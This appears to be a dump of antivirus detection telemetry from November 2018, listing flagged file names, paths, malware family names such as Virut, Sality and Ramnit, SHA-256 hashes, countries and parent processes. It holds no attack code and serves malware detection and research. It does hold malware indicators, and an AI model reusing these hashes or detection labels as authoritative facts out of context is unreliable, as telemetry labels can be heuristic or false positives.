  Row(detection=Row(filename='rundll32.exe', filepath='F:\\RUNDLL32.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6885ab5a728641ff27aa2b1e432b83f7565bb040bc8ad3c5e4cce6db011116cf', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903728, timestamp='2018-11-02T09:38:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plugin.dll', filepath='\\\\?\\C:\\Users\\X\\Desktop\\plugin.dll', filesize=2560000, name='TR/BHO.Gen.#M300.#R3363'), hash='5da2bc60bcb4645cc005ccad3fbd9a109dbaa948506a9ccaab246c034bd5aa30', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grenade.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\GRENADE\\GRENADE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='67621707318f30a9581a95b9bbbcc877719a9c0435c95d988909142c70df5803', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104638-f8fab695', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-104622-F63B0CE0\\AVSCAN-20181102-104638-F8FAB695', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:46:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='requirements_issues.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Requirements_Issues\\Requirements_Issues.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pricora-bg.exe', filepath='\\\\?\\C:\\Windows.old\\Program Files\\Pricora\\Pricora-bg.exe', filesize=896000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='4de9fc65ed3398514c47b7edcc5e81fa6b76b5f00215b4a77e3fe1119d9c34f5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:30:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8169902e.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8169902e.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T09:12:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T23:02:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T12:45:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winbox.exe', filepath='D:\\winbox.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='3d6c50af69cb54c2ff8937975591890b946c4efe5fc3619ffb56093da09f95db', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T13:10:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0001093.exe', filepath='f:\\system volume information\\_restore{4e5c790a-6dd2-469c-90c3-c184502b8d66}\\rp1\\A0001093.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='4560979d734bc5a796c5681661277604256d28c5675c17c1946961ac9bf3dc81', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:11:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-172621-c8a85673', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-172612-C705156D\\AVSCAN-20181102-172621-C8A85673', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111328-48712f5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed6475cc\\AVSCAN-20181102-102215-7882B57A\\AVSCAN-20181102-111328-48712F5D', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:13:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='res.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\res.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='getdatantfs.exe', filepath='E:\\HBCD\\Programs\\GETDATANTFS.exe', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_slots.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_Slots\\Rules_Slots.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084451-70e2b916', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084440-6F264A1E\\AVSCAN-20181102-084451-70E2B916', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210121-37d89a6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a62562e\\AVSCAN-20181102-205937-2A75F477\\AVSCAN-20181102-210121-37D89A6A', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:01:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152644-9c9ea461', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_80c54e39\\AVSCAN-20181102-151549-22F1BB06\\AVSCAN-20181102-152644-9C9EA461', filesize=640000, name='BDC/Assasin.20.B.#M1.#R1'), hash='2319cfafbdcfddcda808eeaac3eab6065a85c63d39d926a7d3c5c9909c504783', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:26:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085846-d32c1bc2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b72c1806\\AVSCAN-20181102-085834-D0C07797\\AVSCAN-20181102-085846-D32C1BC2', filesize=2560000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='205339886face34ee00232b713168104ea19d9a201681c9566121bd0c6c68e94', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-203814-4c241886', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bcadd1e2\\AVSCAN-20181102-203323-2398996E\\AVSCAN-20181102-203814-4C241886', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T23:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-002634-fdfade2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-002634-FDFADE2C', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:26:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082056-d1ad7e5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a0c383b\\AVSCAN-20181102-081858-C4AC0397\\AVSCAN-20181102-082056-D1AD7E5C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:21:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-132218-0e1d3f52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-132218-0E1D3F52', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='D:\\Fayyad\\GMW\\Flan\\R.G. Catalyst\\Need for Speed - Most Wanted\\Core\\libeay32.dll', filesize=1280000, name='W32/Ramnit.CD.#M1.#R1'), hash='6cdc637d4a2f4d9fa9b83af61ac61c3d9b8d76a54ee8ee65f33020533ac57b72', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T12:59:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062347-d3923722', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062347-D3923722', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055237-78dafcf6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055237-78DAFCF6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054249-1a40a436', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054249-1A40A436', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052254-5279d0f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052254-5279D0F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054212-049a2775', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054212-049A2775', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121727-3b212270', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-121727-3B212270', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:34Z'), dt=datetime.date(2018, 11, 2)),
